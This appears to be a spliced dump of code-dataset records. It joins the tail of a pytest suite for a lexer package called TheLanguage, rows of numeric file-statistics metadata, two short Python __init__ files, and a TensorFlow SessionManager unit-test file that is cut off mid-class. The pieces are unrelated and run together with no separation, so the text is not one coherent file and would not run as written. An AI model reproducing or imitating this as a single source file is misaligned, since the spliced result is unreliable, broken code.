Match: "<_sre.SRE_Match object; span=(0, 3), match='one'>"
Whitespace: None
Phrase: "Word"
Phrase: "(Word | Newline+)"
- # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.TokenLexResultData'>
IsIgnored: False
IterBegin: "[1, 4] (3)"
IterEnd: "[2, 1] (4)"
Token: "Newline+"
Value: # <class 'TheLanguage.Lexer.Components.Token.NewlineToken.MatchResult'>
End: 4
Start: 3
Whitespace: None
Phrase: "Newline+"
Phrase: "(Word | Newline+)"
- # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.TokenLexResultData'>
IsIgnored: False
IterBegin: "[2, 1] (4)"
IterEnd: "[2, 4] (7)"
Token: "Word"
Value: # <class 'TheLanguage.Lexer.Components.Token.RegexToken.MatchResult'>
Match: "<_sre.SRE_Match object; span=(4, 7), match='two'>"
Whitespace: None
Phrase: "Word"
Phrase: "(Word | Newline+)"
- # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.TokenLexResultData'>
IsIgnored: False
IterBegin: "[2, 4] (7)"
IterEnd: "[3, 1] (8)"
Token: "Newline+"
Value: # <class 'TheLanguage.Lexer.Components.Token.NewlineToken.MatchResult'>
End: 8
Start: 7
Whitespace: None
Phrase: "Newline+"
Phrase: "(Word | Newline+)"
IsComplete: True
Phrase: "{(Word | Newline+), 4, 4}"
IterBegin: "[1, 1] (0)"
IterEnd: "[3, 1] (8)"
Success: True
""",
)
# ----------------------------------------------------------------------
@pytest.mark.asyncio
async def test_ExactNoMatch(self, parse_mock):
result = await self._exact_phrase.LexAsync(
("root", ),
CreateIterator("one"),
parse_mock,
)
assert str(result) == textwrap.dedent(
"""\
# <class 'TheLanguage.Lexer.Components.Phrase.Phrase.LexResult'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.MultipleLexResultData'>
DataItems:
- # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.TokenLexResultData'>
IsIgnored: False
IterBegin: "[1, 1] (0)"
IterEnd: "[1, 4] (3)"
Token: "Word"
Value: # <class 'TheLanguage.Lexer.Components.Token.RegexToken.MatchResult'>
Match: "<_sre.SRE_Match object; span=(0, 3), match='one'>"
Whitespace: None
Phrase: "Word"
Phrase: "(Word | Newline+)"
- # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.TokenLexResultData'>
IsIgnored: False
IterBegin: "[1, 4] (3)"
IterEnd: "[2, 1] (4)"
Token: "Newline+"
Value: # <class 'TheLanguage.Lexer.Components.Token.NewlineToken.MatchResult'>
End: 4
Start: 3
Whitespace: None
Phrase: "Newline+"
Phrase: "(Word | Newline+)"
IsComplete: True
Phrase: "{(Word | Newline+), 4, 4}"
IterBegin: "[1, 1] (0)"
IterEnd: "[2, 1] (4)"
Success: False
""",
)
# ----------------------------------------------------------------------
@pytest.mark.asyncio
async def test_Error2ndLine3rdToken(self, parse_mock):
result = await self._phrase.LexAsync(
("root", ),
CreateIterator(
textwrap.dedent(
"""\
one
_expected_match_but_has_underscores
""",
),
),
parse_mock,
)
assert str(result) == textwrap.dedent(
"""\
# <class 'TheLanguage.Lexer.Components.Phrase.Phrase.LexResult'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.MultipleLexResultData'>
DataItems:
- # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.TokenLexResultData'>
IsIgnored: False
IterBegin: "[1, 1] (0)"
IterEnd: "[1, 4] (3)"
Token: "Word"
Value: # <class 'TheLanguage.Lexer.Components.Token.RegexToken.MatchResult'>
Match: "<_sre.SRE_Match object; span=(0, 3), match='one'>"
Whitespace: None
Phrase: "Word"
Phrase: "(Word | Newline+)"
- # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.TokenLexResultData'>
IsIgnored: False
IterBegin: "[1, 4] (3)"
IterEnd: "[2, 1] (4)"
Token: "Newline+"
Value: # <class 'TheLanguage.Lexer.Components.Token.NewlineToken.MatchResult'>
End: 4
Start: 3
Whitespace: None
Phrase: "Newline+"
Phrase: "(Word | Newline+)"
IsComplete: True
Phrase: "{(Word | Newline+), 2, 4}"
IterBegin: "[1, 1] (0)"
IterEnd: "[2, 1] (4)"
Success: True
""",
)
# ----------------------------------------------------------------------
@pytest.mark.asyncio
async def test_Error2ndLine4thToken(self, parse_mock):
result = await self._phrase.LexAsync(
("root", ),
CreateIterator(
textwrap.dedent(
"""\
one
two _invalid_
""",
),
),
parse_mock,
)
assert str(result) == textwrap.dedent(
"""\
# <class 'TheLanguage.Lexer.Components.Phrase.Phrase.LexResult'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.MultipleLexResultData'>
DataItems:
- # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.TokenLexResultData'>
IsIgnored: False
IterBegin: "[1, 1] (0)"
IterEnd: "[1, 4] (3)"
Token: "Word"
Value: # <class 'TheLanguage.Lexer.Components.Token.RegexToken.MatchResult'>
Match: "<_sre.SRE_Match object; span=(0, 3), match='one'>"
Whitespace: None
Phrase: "Word"
Phrase: "(Word | Newline+)"
- # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.TokenLexResultData'>
IsIgnored: False
IterBegin: "[1, 4] (3)"
IterEnd: "[2, 1] (4)"
Token: "Newline+"
Value: # <class 'TheLanguage.Lexer.Components.Token.NewlineToken.MatchResult'>
End: 4
Start: 3
Whitespace: None
Phrase: "Newline+"
Phrase: "(Word | Newline+)"
- # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.StandardLexResultData'>
Data: # <class 'TheLanguage.Lexer.Components.Phrase.Phrase.TokenLexResultData'>
IsIgnored: False
IterBegin: "[2, 1] (4)"
IterEnd: "[2, 4] (7)"
Token: "Word"
Value: # <class 'TheLanguage.Lexer.Components.Token.RegexToken.MatchResult'>
Match: "<_sre.SRE_Match object; span=(4, 7), match='two'>"
Whitespace: None
Phrase: "Word"
Phrase: "(Word | Newline+)"
IsComplete: True
Phrase: "{(Word | Newline+), 2, 4}"
IterBegin: "[1, 1] (0)"
IterEnd: "[2, 4] (7)"
Success: True
""",
)
# ----------------------------------------------------------------------
def test_CreationErrors():
with pytest.raises(AssertionError):
RepeatPhrase(TokenPhrase(NewlineToken()), -1, 10)
with pytest.raises(AssertionError):
RepeatPhrase(TokenPhrase(NewlineToken()), 10, 5)
# ----------------------------------------------------------------------
@pytest.mark.asyncio
async def test_parseReturnsNone(parse_mock):
# ----------------------------------------------------------------------
class NonePhrase(Phrase):
# ----------------------------------------------------------------------
@Interface.override
async def LexAsync(self, *args, **kwargs):
return None
# ----------------------------------------------------------------------
@Interface.override
def _PopulateRecursiveImpl(
self,
new_phrase: Phrase,
) -> bool:
# Nothing to do here
return False
# ----------------------------------------------------------------------
phrase = RepeatPhrase(NonePhrase("None Phrase"), 1, None)
result = await phrase.LexAsync(("root", ), CreateIterator("test"), parse_mock)
assert result is None
# ----------------------------------------------------------------------
@pytest.mark.asyncio
async def test_OnInternalPhraseFalse(parse_mock):
parse_mock.OnInternalPhraseAsync = CoroutineMock(return_value=False)
Phrase = RepeatPhrase(TokenPhrase(NewlineToken()), 1, None)
result = await Phrase.LexAsync(
("root", ),
CreateIterator(
textwrap.dedent(
"""\
""",
),
),
parse_mock,
)
assert result is None
| 48.668973
| 112
| 0.456986
| 2,990
| 42,196
| 6.403679
| 0.06087
| 0.138716
| 0.182065
| 0.268763
| 0.899932
| 0.899932
| 0.887293
| 0.87878
| 0.867864
| 0.867864
| 0
| 0.01737
| 0.401033
| 42,196
| 866
| 113
| 48.725173
| 0.740207
| 0.046829
| 0
| 0.497585
| 0
| 0
| 0.014049
| 0
| 0
| 0
| 0
| 0
| 0.091787
| 1
| 0.009662
| false
| 0
| 0.057971
| 0.004831
| 0.111111
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
ba1408d9b8f74852bc37ffeedd1f0b52bc888123
| 53
|
py
|
Python
|
quarantine/view/__init__.py
|
kwoolter/Quarantine
|
7b824a3d6eebbded611c48e44dcb3c2e4007033e
|
[
"BSD-2-Clause"
] | null | null | null |
quarantine/view/__init__.py
|
kwoolter/Quarantine
|
7b824a3d6eebbded611c48e44dcb3c2e4007033e
|
[
"BSD-2-Clause"
] | null | null | null |
quarantine/view/__init__.py
|
kwoolter/Quarantine
|
7b824a3d6eebbded611c48e44dcb3c2e4007033e
|
[
"BSD-2-Clause"
] | null | null | null |
from . view import QMainFrame
from . view import View
| 26.5
| 29
| 0.792453
| 8
| 53
| 5.25
| 0.5
| 0.380952
| 0.666667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.169811
| 53
| 2
| 30
| 26.5
| 0.954545
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
ba2149423eaf6720551bc4e3d9acc8e16e89ebf5
| 190
|
py
|
Python
|
caldera/data/__init__.py
|
jvrana/pyro-graphnets
|
1c9809253e47414ecf3f6604c2147d5676ff76c0
|
[
"MIT"
] | null | null | null |
caldera/data/__init__.py
|
jvrana/pyro-graphnets
|
1c9809253e47414ecf3f6604c2147d5676ff76c0
|
[
"MIT"
] | null | null | null |
caldera/data/__init__.py
|
jvrana/pyro-graphnets
|
1c9809253e47414ecf3f6604c2147d5676ff76c0
|
[
"MIT"
] | null | null | null |
from caldera.data.graph_batch import GraphBatch
from caldera.data.graph_data import GraphData
from caldera.data.graph_tuple import GraphTuple
from caldera.data.loader import GraphDataLoader
| 38
| 47
| 0.873684
| 27
| 190
| 6.037037
| 0.444444
| 0.269939
| 0.368098
| 0.368098
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.084211
| 190
| 4
| 48
| 47.5
| 0.936782
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
e846dc48dfdc956f5402e40dcea479c66a38774e
| 25,714
|
py
|
Python
|
tensorflow/python/training/session_manager_test.py
|
yxiong/tensorflow
|
f71cc62282bf2e066f9ebd08cf3f605fc98c6e41
|
[
"Apache-2.0"
] | 6
|
2016-09-07T18:38:41.000Z
|
2020-01-12T23:01:03.000Z
|
tensorflow/python/training/session_manager_test.py
|
yxiong/tensorflow
|
f71cc62282bf2e066f9ebd08cf3f605fc98c6e41
|
[
"Apache-2.0"
] | null | null | null |
tensorflow/python/training/session_manager_test.py
|
yxiong/tensorflow
|
f71cc62282bf2e066f9ebd08cf3f605fc98c6e41
|
[
"Apache-2.0"
] | 8
|
2017-06-08T09:46:06.000Z
|
2021-06-20T14:03:19.000Z
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for SessionManager."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import tensorflow as tf
from tensorflow.python.framework import errors
from tensorflow.python.platform import gfile
class SessionManagerTest(tf.test.TestCase):
def testPrepareSessionSucceeds(self):
with tf.Graph().as_default():
v = tf.Variable([1.0, 2.0, 3.0], name="v")
sm = tf.train.SessionManager(ready_op=tf.report_uninitialized_variables())
sess = sm.prepare_session("", init_op=tf.initialize_all_variables())
self.assertAllClose([1.0, 2.0, 3.0], sess.run(v))
def testPrepareSessionSucceedsWithInitFeedDict(self):
with tf.Graph().as_default():
p = tf.placeholder(tf.float32, shape=(3,))
v = tf.Variable(p, name="v")
sm = tf.train.SessionManager(ready_op=tf.report_uninitialized_variables())
sess = sm.prepare_session("",
init_op=tf.initialize_all_variables(),
init_feed_dict={p: [1.0, 2.0, 3.0]})
self.assertAllClose([1.0, 2.0, 3.0], sess.run(v))
def testPrepareSessionSucceedsWithInitFn(self):
with tf.Graph().as_default():
v = tf.Variable([125], name="v")
sm = tf.train.SessionManager(ready_op=tf.report_uninitialized_variables())
sess = sm.prepare_session("",
init_fn=lambda sess: sess.run(v.initializer))
self.assertAllClose([125], sess.run(v))
def testPrepareSessionFails(self):
checkpoint_dir = os.path.join(self.get_temp_dir(), "prepare_session")
checkpoint_dir2 = os.path.join(self.get_temp_dir(), "prepare_session2")
try:
gfile.DeleteRecursively(checkpoint_dir)
gfile.DeleteRecursively(checkpoint_dir2)
except OSError:
pass # Ignore
gfile.MakeDirs(checkpoint_dir)
with tf.Graph().as_default():
v = tf.Variable([1.0, 2.0, 3.0], name="v")
sm = tf.train.SessionManager(ready_op=tf.report_uninitialized_variables())
saver = tf.train.Saver({"v": v})
sess = sm.prepare_session("", init_op=tf.initialize_all_variables(),
saver=saver, checkpoint_dir=checkpoint_dir)
self.assertAllClose([1.0, 2.0, 3.0], sess.run(v))
checkpoint_filename = os.path.join(checkpoint_dir,
"prepare_session_checkpoint")
saver.save(sess, checkpoint_filename)
# Create a new Graph and SessionManager and recover.
with tf.Graph().as_default():
# Renames the checkpoint directory.
os.rename(checkpoint_dir, checkpoint_dir2)
gfile.MakeDirs(checkpoint_dir)
v = tf.Variable([6.0, 7.0, 8.0], name="v")
with self.test_session():
self.assertEqual(False, tf.is_variable_initialized(v).eval())
tf.train.SessionManager(ready_op=tf.report_uninitialized_variables())
saver = tf.train.Saver({"v": v})
# This should fail as there's no checkpoint within 2 seconds.
with self.assertRaisesRegexp(
RuntimeError, "no init_op or init_fn or local_init_op was given"):
sess = sm.prepare_session("", init_op=None, saver=saver,
checkpoint_dir=checkpoint_dir,
wait_for_checkpoint=True, max_wait_secs=2)
# Rename the checkpoint directory back.
gfile.DeleteRecursively(checkpoint_dir)
os.rename(checkpoint_dir2, checkpoint_dir)
# This should succeed as there's checkpoint.
sess = sm.prepare_session("", init_op=None, saver=saver,
checkpoint_dir=checkpoint_dir,
wait_for_checkpoint=True, max_wait_secs=2)
self.assertEqual(
True, tf.is_variable_initialized(
sess.graph.get_tensor_by_name("v:0")).eval(session=sess))
def testRecoverSession(self):
# Create a checkpoint.
checkpoint_dir = os.path.join(self.get_temp_dir(), "recover_session")
try:
gfile.DeleteRecursively(checkpoint_dir)
except OSError:
pass # Ignore
gfile.MakeDirs(checkpoint_dir)
with tf.Graph().as_default():
v = tf.Variable(1, name="v")
sm = tf.train.SessionManager(ready_op=tf.report_uninitialized_variables())
saver = tf.train.Saver({"v": v})
sess, initialized = sm.recover_session("", saver=saver,
checkpoint_dir=checkpoint_dir)
self.assertFalse(initialized)
sess.run(v.initializer)
self.assertEquals(1, sess.run(v))
saver.save(sess, os.path.join(checkpoint_dir,
"recover_session_checkpoint"))
# Create a new Graph and SessionManager and recover.
with tf.Graph().as_default():
v = tf.Variable(2, name="v")
with self.test_session():
self.assertEqual(False, tf.is_variable_initialized(v).eval())
sm2 = tf.train.SessionManager(
ready_op=tf.report_uninitialized_variables())
saver = tf.train.Saver({"v": v})
sess, initialized = sm2.recover_session("", saver=saver,
checkpoint_dir=checkpoint_dir)
self.assertTrue(initialized)
self.assertEqual(
True, tf.is_variable_initialized(
sess.graph.get_tensor_by_name("v:0")).eval(session=sess))
self.assertEquals(1, sess.run(v))
def testWaitForSessionReturnsNoneAfterTimeout(self):
with tf.Graph().as_default():
tf.Variable(1, name="v")
sm = tf.train.SessionManager(ready_op=tf.report_uninitialized_variables(),
recovery_wait_secs=1)
# Set max_wait_secs to allow us to try a few times.
with self.assertRaises(errors.DeadlineExceededError):
sm.wait_for_session(master="", max_wait_secs=3)
def testInitWithNoneLocalInitOpError(self):
# Creating a SessionManager with a None local_init_op but
# non-None ready_for_local_init_op raises ValueError
with self.assertRaisesRegexp(ValueError,
"If you pass a ready_for_local_init_op "
"you must also pass a local_init_op "):
tf.train.SessionManager(
ready_for_local_init_op=tf.report_uninitialized_variables(
tf.all_variables()),
local_init_op=None)
def testRecoverSessionWithReadyForLocalInitOp(self):
# Create a checkpoint.
checkpoint_dir = os.path.join(self.get_temp_dir(),
"recover_session_ready_for_local_init")
try:
gfile.DeleteRecursively(checkpoint_dir)
except OSError:
pass # Ignore
gfile.MakeDirs(checkpoint_dir)
with tf.Graph().as_default():
v = tf.Variable(1, name="v")
sm = tf.train.SessionManager(ready_op=tf.report_uninitialized_variables())
saver = tf.train.Saver({"v": v})
sess, initialized = sm.recover_session(
"", saver=saver, checkpoint_dir=checkpoint_dir)
self.assertFalse(initialized)
sess.run(v.initializer)
self.assertEquals(1, sess.run(v))
saver.save(sess, os.path.join(checkpoint_dir,
"recover_session_checkpoint"))
# Create a new Graph and SessionManager and recover.
with tf.Graph().as_default():
v = tf.Variable(2, name="v")
w = tf.Variable(
v,
trainable=False,
collections=[tf.GraphKeys.LOCAL_VARIABLES],
name="w")
with self.test_session():
self.assertEqual(False, tf.is_variable_initialized(v).eval())
self.assertEqual(False, tf.is_variable_initialized(w).eval())
sm2 = tf.train.SessionManager(
ready_op=tf.report_uninitialized_variables(),
ready_for_local_init_op=tf.report_uninitialized_variables(
tf.all_variables()),
local_init_op=w.initializer)
saver = tf.train.Saver({"v": v})
sess, initialized = sm2.recover_session(
"", saver=saver, checkpoint_dir=checkpoint_dir)
self.assertTrue(initialized)
self.assertEqual(
True,
tf.is_variable_initialized(sess.graph.get_tensor_by_name("v:0")).eval(
session=sess))
self.assertEqual(
True,
tf.is_variable_initialized(sess.graph.get_tensor_by_name("w:0")).eval(
session=sess))
self.assertEquals(1, sess.run(v))
self.assertEquals(1, sess.run(w))
def testRecoverSessionWithReadyForLocalInitOpFailsToReadyLocal(self):
# We use ready_for_local_init_op=tf.report_uninitialized_variables(),
# which causes recover_session to not run local_init_op, and to return
# initialized=False
# Create a checkpoint.
checkpoint_dir = os.path.join(
self.get_temp_dir(),
"recover_session_ready_for_local_init_fails_to_ready_local")
try:
gfile.DeleteRecursively(checkpoint_dir)
except OSError:
pass # Ignore
gfile.MakeDirs(checkpoint_dir)
with tf.Graph().as_default():
v = tf.Variable(1, name="v")
sm = tf.train.SessionManager(ready_op=tf.report_uninitialized_variables())
saver = tf.train.Saver({"v": v})
sess, initialized = sm.recover_session(
"", saver=saver, checkpoint_dir=checkpoint_dir)
self.assertFalse(initialized)
sess.run(v.initializer)
self.assertEquals(1, sess.run(v))
saver.save(sess, os.path.join(checkpoint_dir,
"recover_session_checkpoint"))
# Create a new Graph and SessionManager and recover.
with tf.Graph().as_default():
v = tf.Variable(2, name="v")
w = tf.Variable(
v,
trainable=False,
collections=[tf.GraphKeys.LOCAL_VARIABLES],
name="w")
with self.test_session():
self.assertEqual(False, tf.is_variable_initialized(v).eval())
self.assertEqual(False, tf.is_variable_initialized(w).eval())
sm2 = tf.train.SessionManager(
ready_op=tf.report_uninitialized_variables(),
ready_for_local_init_op=tf.report_uninitialized_variables(),
local_init_op=w.initializer)
saver = tf.train.Saver({"v": v})
sess, initialized = sm2.recover_session(
"", saver=saver, checkpoint_dir=checkpoint_dir)
self.assertFalse(initialized)
self.assertEqual(
True,
tf.is_variable_initialized(sess.graph.get_tensor_by_name("v:0")).eval(
session=sess))
self.assertEqual(
False,
tf.is_variable_initialized(sess.graph.get_tensor_by_name("w:0")).eval(
session=sess))
self.assertEquals(1, sess.run(v))
def testRecoverSessionNoChkptStillRunsLocalInitOp(self):
# This test checks for backwards compatibility.
# In particular, we continue to ensure that recover_session will execute
# local_init_op exactly once, regardless of whether the session was
# successfully recovered.
with tf.Graph().as_default():
w = tf.Variable(
1,
trainable=False,
collections=[tf.GraphKeys.LOCAL_VARIABLES],
name="w")
with self.test_session():
self.assertEqual(False, tf.is_variable_initialized(w).eval())
sm2 = tf.train.SessionManager(
ready_op=tf.report_uninitialized_variables(),
ready_for_local_init_op=None,
local_init_op=w.initializer)
# Try to recover session from None
sess, initialized = sm2.recover_session(
"", saver=None, checkpoint_dir=None)
# Succeeds because recover_session still run local_init_op
self.assertFalse(initialized)
self.assertEqual(
True,
tf.is_variable_initialized(sess.graph.get_tensor_by_name("w:0")).eval(
session=sess))
self.assertEquals(1, sess.run(w))
def testRecoverSessionFailsStillRunsLocalInitOp(self):
# Create a checkpoint.
checkpoint_dir = os.path.join(
self.get_temp_dir(),
"recover_session_ready_for_local_init_fails_stil_run")
try:
gfile.DeleteRecursively(checkpoint_dir)
except OSError:
pass # Ignore
gfile.MakeDirs(checkpoint_dir)
# Create a new Graph and SessionManager and recover.
with tf.Graph().as_default():
v = tf.Variable(2, name="v")
w = tf.Variable(
1,
trainable=False,
collections=[tf.GraphKeys.LOCAL_VARIABLES],
name="w")
with self.test_session():
self.assertEqual(False, tf.is_variable_initialized(v).eval())
self.assertEqual(False, tf.is_variable_initialized(w).eval())
sm2 = tf.train.SessionManager(
ready_op=tf.report_uninitialized_variables(),
ready_for_local_init_op=None,
local_init_op=w.initializer)
saver = tf.train.Saver({"v": v})
sess, initialized = sm2.recover_session(
"",
saver=saver,
checkpoint_dir=checkpoint_dir,
wait_for_checkpoint=False)
self.assertFalse(initialized)
self.assertEqual(
False,
tf.is_variable_initialized(sess.graph.get_tensor_by_name("v:0")).eval(
session=sess))
self.assertEqual(
True,
tf.is_variable_initialized(sess.graph.get_tensor_by_name("w:0")).eval(
session=sess))
self.assertEquals(1, sess.run(w))
def testWaitForSessionLocalInit(self):
server = tf.train.Server.create_local_server()
with tf.Graph().as_default() as graph:
v = tf.Variable(1, name="v")
w = tf.Variable(
v,
trainable=False,
collections=[tf.GraphKeys.LOCAL_VARIABLES],
name="w")
sm = tf.train.SessionManager(
graph=graph,
ready_op=tf.report_uninitialized_variables(),
ready_for_local_init_op=tf.report_uninitialized_variables(
tf.all_variables()),
local_init_op=w.initializer)
# Initialize v but not w
s = tf.Session(server.target, graph=graph)
s.run(v.initializer)
sess = sm.wait_for_session(server.target, max_wait_secs=3)
self.assertEqual(
True,
tf.is_variable_initialized(sess.graph.get_tensor_by_name("v:0")).eval(
session=sess))
self.assertEqual(
True,
tf.is_variable_initialized(sess.graph.get_tensor_by_name("w:0")).eval(
session=sess))
self.assertEquals(1, sess.run(v))
self.assertEquals(1, sess.run(w))
def testWaitForSessionWithReadyForLocalInitOpFailsToReadyLocal(self):
with tf.Graph().as_default() as graph:
v = tf.Variable(1, name="v")
w = tf.Variable(
v,
trainable=False,
collections=[tf.GraphKeys.LOCAL_VARIABLES],
name="w")
sm = tf.train.SessionManager(
graph=graph,
ready_op=tf.report_uninitialized_variables(),
ready_for_local_init_op=tf.report_uninitialized_variables(),
local_init_op=w.initializer)
with self.assertRaises(tf.errors.DeadlineExceededError):
# Time-out because w fails to be initialized,
# because of overly restrictive ready_for_local_init_op
sm.wait_for_session("", max_wait_secs=3)
def testWaitForSessionInsufficientReadyForLocalInitCheck(self):
with tf.Graph().as_default() as graph:
v = tf.Variable(1, name="v")
w = tf.Variable(
v,
trainable=False,
collections=[tf.GraphKeys.LOCAL_VARIABLES],
name="w")
sm = tf.train.SessionManager(
graph=graph,
ready_op=tf.report_uninitialized_variables(),
ready_for_local_init_op=None,
local_init_op=w.initializer)
with self.assertRaisesRegexp(tf.errors.FailedPreconditionError,
"Attempting to use uninitialized value v"):
sm.wait_for_session("", max_wait_secs=3)
def testPrepareSessionWithReadyForLocalInitOp(self):
with tf.Graph().as_default():
v = tf.Variable(1, name="v")
w = tf.Variable(
v,
trainable=False,
collections=[tf.GraphKeys.LOCAL_VARIABLES],
name="w")
with self.test_session():
self.assertEqual(False, tf.is_variable_initialized(v).eval())
self.assertEqual(False, tf.is_variable_initialized(w).eval())
sm2 = tf.train.SessionManager(
ready_op=tf.report_uninitialized_variables(),
ready_for_local_init_op=tf.report_uninitialized_variables(
tf.all_variables()),
local_init_op=w.initializer)
sess = sm2.prepare_session("", init_op=v.initializer)
self.assertEqual(
True,
tf.is_variable_initialized(sess.graph.get_tensor_by_name("v:0")).eval(
session=sess))
self.assertEqual(
True,
tf.is_variable_initialized(sess.graph.get_tensor_by_name("w:0")).eval(
session=sess))
self.assertEquals(1, sess.run(v))
self.assertEquals(1, sess.run(w))
def testPrepareSessionDidNotInitLocalVariable(self):
with tf.Graph().as_default():
v = tf.Variable(1, name="v")
w = tf.Variable(
v,
trainable=False,
collections=[tf.GraphKeys.LOCAL_VARIABLES],
name="w")
with self.test_session():
self.assertEqual(False, tf.is_variable_initialized(v).eval())
self.assertEqual(False, tf.is_variable_initialized(w).eval())
sm2 = tf.train.SessionManager(
ready_op=tf.report_uninitialized_variables())
with self.assertRaisesRegexp(RuntimeError,
"Init operations did not make model ready"):
sm2.prepare_session("", init_op=v.initializer)
def testPrepareSessionWithReadyNotReadyForLocal(self):
with tf.Graph().as_default():
v = tf.Variable(1, name="v")
w = tf.Variable(
v,
trainable=False,
collections=[tf.GraphKeys.LOCAL_VARIABLES],
name="w")
with self.test_session():
self.assertEqual(False, tf.is_variable_initialized(v).eval())
self.assertEqual(False, tf.is_variable_initialized(w).eval())
sm2 = tf.train.SessionManager(
ready_op=tf.report_uninitialized_variables(),
ready_for_local_init_op=tf.report_uninitialized_variables(
tf.all_variables()),
local_init_op=w.initializer)
with self.assertRaisesRegexp(
RuntimeError,
"Init operations did not make model ready for local_init"):
sm2.prepare_session("", init_op=None)
def testPrepareSessionWithInsufficientReadyForLocalInitCheck(self):
with tf.Graph().as_default():
v = tf.Variable(1, name="v")
w = tf.Variable(
v,
trainable=False,
collections=[tf.GraphKeys.LOCAL_VARIABLES],
name="w")
with self.test_session():
self.assertEqual(False, tf.is_variable_initialized(v).eval())
self.assertEqual(False, tf.is_variable_initialized(w).eval())
sm2 = tf.train.SessionManager(
ready_op=tf.report_uninitialized_variables(),
ready_for_local_init_op=None,
local_init_op=w.initializer)
with self.assertRaisesRegexp(tf.errors.FailedPreconditionError,
"Attempting to use uninitialized value v"):
sm2.prepare_session("", init_op=None)
class ObsoleteSessionManagerTest(tf.test.TestCase):
    """SessionManager tests using the deprecated `assert_variables_initialized`
    ready_op (kept to guard backwards compatibility)."""

    def testPrepareSessionSucceeds(self):
        """prepare_session with an init_op initializes the model."""
        with tf.Graph().as_default():
            v = tf.Variable([1.0, 2.0, 3.0], name="v")
            sm = tf.train.SessionManager(ready_op=tf.assert_variables_initialized())
            sess = sm.prepare_session("", init_op=tf.initialize_all_variables())
            self.assertAllClose([1.0, 2.0, 3.0], sess.run(v))

    def testPrepareSessionSucceedsWithInitFeedDict(self):
        """prepare_session forwards init_feed_dict to the init_op run."""
        with tf.Graph().as_default():
            p = tf.placeholder(tf.float32, shape=(3,))
            v = tf.Variable(p, name="v")
            sm = tf.train.SessionManager(ready_op=tf.assert_variables_initialized())
            sess = sm.prepare_session("",
                                      init_op=tf.initialize_all_variables(),
                                      init_feed_dict={p: [1.0, 2.0, 3.0]})
